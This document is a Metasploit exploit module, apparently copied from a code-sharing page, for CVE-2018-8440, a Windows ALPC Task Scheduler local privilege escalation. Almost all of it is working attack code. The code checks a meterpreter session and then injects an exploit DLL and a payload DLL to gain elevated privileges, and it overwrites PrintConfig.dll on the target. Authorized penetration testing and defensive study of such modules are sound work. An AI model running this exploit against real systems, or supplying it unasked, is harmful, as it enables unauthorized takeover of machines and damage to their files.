Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = NormalRanking
8

9
  include Msf::Post::File
10
  include Msf::Exploit::EXE
11
  include Msf::Post::Windows::Priv
12
  include Msf::Post::Windows::Process
13
  include Msf::Post::Windows::ReflectiveDLLInjection
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
20
        'Description' => %q{
21
          On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented
22
          by the task scheduler service can be used to write arbitrary DACLs to `.job` files located
23
          in `c:\windows\tasks` because the scheduler does not use impersonation when checking this
24
          location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
25
          created to a file the user has read access to. After creating a hardlink, the vulnerability
26
          can be triggered to set the DACL on the linked file.
27

28
          WARNING:
29
          The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
30
          will be overwritten when the exploit runs.
31

32
          This module has been tested against Windows 10 Pro x64.
33
        },
34
        'License' => MSF_LICENSE,
35
        'Author' => [
36
          'SandboxEscaper', # Original discovery and PoC
37
          'bwatters-r7',          # msf module
38
          'asoto-r7',             # msf module
39
          'Jacob Robles'          # msf module
40
        ],
41
        'Platform' => 'win',
42
        'SessionTypes' => ['meterpreter'],
43
        'Targets' => [
44
          ['Windows 10 x64', { 'Arch' => ARCH_X64 }]
45
        ],
46
        'References' => [
47
          ['CVE', '2018-8440'],
48
          ['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
49
        ],
50
        'Notes' => {
51
          # Exploit overwrites PrintConfig.dll, which makes it unusable.
52
          'Stability' => [ OS_RESOURCE_LOSS ],
53
          'Reliability' => [ REPEATABLE_SESSION ]
54
        },
55
        'DisclosureDate' => '2018-08-27',
56
        'DefaultTarget' => 0
57
      )
58
    )
59
  end
60

61
  def validate_active_host
62
    sysinfo['Computer']
63
    true
64
  rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
65
    elog(e)
66
    false
67
  end
68

69
  def validate_target
70
    if is_system?
71
      fail_with(Failure::None, 'Session is already elevated')
72
    end
73

74
    if sysinfo['Architecture'] == ARCH_X86
75
      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
76
    end
77

78
    version = get_version_info
79
    if version.xp_or_2003? && version.workstation?
80
      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
81
    end
82
  end
83

84
  def exploit
85
    unless session.type == 'meterpreter'
86
      fail_with(Failure::None, 'Only meterpreter sessions are supported')
87
    end
88

89
    print_status('Checking target...')
90
    unless validate_active_host
91
      raise Msf::Exploit::Failed, 'Could not connect to session'
92
    end
93

94
    validate_target
95

96
    print_status('Target looks good... attempting the LPE exploit')
97
    execute_dll(
98
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll'),
99
      generate_payload_dll
100
    )
101
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
102
  rescue Rex::Post::Meterpreter::RequestError => e
103
    elog(e)
104
    print_error(e.message)
105
  end
106
end
107

108